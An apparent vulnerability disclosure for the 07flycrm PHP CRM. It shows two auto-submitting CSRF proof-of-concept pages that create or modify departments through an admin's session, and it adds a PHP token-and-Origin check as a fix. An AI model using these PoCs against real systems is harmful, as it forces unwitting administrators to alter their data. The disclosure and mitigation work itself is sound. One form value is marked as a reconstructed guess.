lingqifei/07flycrm

several CSRF vulnerabilities that can perform CRUD operations


After logging in as administrator, the PoC below, opened in another HTML page, can force a database CRUD operation,
such as creating a new department:

<html>
  <head><meta charset="utf-8"></head>
  <body>
  <!-- Rewrite the displayed URL so the address bar does not reveal the PoC location. -->
  <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the dept_add action; the browser attaches the admin's session cookie. -->
    <form action="http://127.0.0.1/v1/index.php/Dept/dept_add/" method="POST">
      <input type="hidden" name="name" value="1234" />
      <input type="hidden" name="tel" value="1234" />
      <input type="hidden" name="fax" value="1234" />
      <input type="hidden" name="parentID" value="29" />
      <input type="hidden" name="sort" value="2" />
      <input type="hidden" name="visible" value="1" />
      <input type="hidden" name="intro" value="1234" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- Submit automatically so no click is needed; the button remains for manual testing. -->
    <script>document.forms[0].submit()</script>
  </body>
</html>

and department modify:

<html>
  <head><meta charset="utf-8"></head>
  <body>
  <!-- Rewrite the displayed URL so the address bar does not reveal the PoC location. -->
  <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to dept_modify for the department with id 31. -->
    <form action="http://127.0.0.1/v1/index.php/Dept/dept_modify/id/31" method="POST">
      <!-- The original name value was mis-encoded UTF-8; "品牌部" is an assumed reconstruction, any non-ASCII name works. -->
      <input type="hidden" name="name" value="品牌部" />
      <input type="hidden" name="tel" value="123456" />
      <input type="hidden" name="fax" value="123456" />
      <input type="hidden" name="parentID" value="29" />
      <input type="hidden" name="sort" value="1" />
      <input type="hidden" name="visible" value="1" />
      <input type="hidden" name="intro" value="123456" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- Submit automatically so no click is needed; the button remains for manual testing. -->
    <script>document.forms[0].submit()</script>
  </body>
</html>
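Both PoCs work because the `Dept/dept_add` and `Dept/dept_modify` actions accept any POST that carries the admin's session cookie. The following is an added example of a synchronizer-token check for a PHP controller of this shape; it is not 07flycrm code, and the `_csrf` field name, the `csrf_*` helper names and the assumption that PHP sessions are already started are mine, not the project's.

```php
<?php
// Added example (not 07flycrm code): CSRF protection for a state-changing
// action such as Dept/dept_add. Assumptions: session_start() has run, the
// form template can call csrf_field(), and the hidden field is named `_csrf`.

declare(strict_types=1);

function csrf_token(): string
{
    // One token per session, from a CSPRNG. The attacker's page cannot read
    // it: the same-origin policy blocks cross-site reads of the form HTML.
    if (empty($_SESSION['_csrf'])) {
        $_SESSION['_csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['_csrf'];
}

function csrf_field(): string
{
    // Rendered into every form that writes to the database.
    return '<input type="hidden" name="_csrf" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function same_site_origin(array $server, string $expectedHost): bool
{
    // Browsers send Origin on cross-site POSTs; fall back to Referer.
    // history.pushState in the PoC does not change the Origin the browser
    // sends, so a cross-site submission still fails here.
    $hdr  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($hdr, PHP_URL_HOST);   // false for "null" or missing
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

function verify_csrf(array $post, array $server, string $expectedHost): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    if (!same_site_origin($server, $expectedHost)) {
        return false;
    }
    $sent     = $post['_csrf'] ?? '';
    $expected = $_SESSION['_csrf'] ?? '';
    // hash_equals avoids a timing side channel; an empty session token
    // means no form was ever issued to this session, so reject.
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// Usage at the top of dept_add / dept_modify, before any database write:
//
//   session_start();
//   $host = explode(':', $_SERVER['HTTP_HOST'])[0];   // strip a port, if any
//   if (!verify_csrf($_POST, $_SERVER, $host)) {
//       http_response_code(403);
//       exit('CSRF check failed');
//   }
//   ... existing department logic ...
```

The Origin/Referer check and the token check are deliberately independent: the token alone defends against the PoCs above, and the Origin check catches a token accidentally leaked into a URL or log. Setting the session cookie with `SameSite=Lax` (`session_set_cookie_params(['samesite' => 'Lax'])` on PHP 7.3+) adds a third layer, since the browser then omits the cookie from cross-site POSTs entirely.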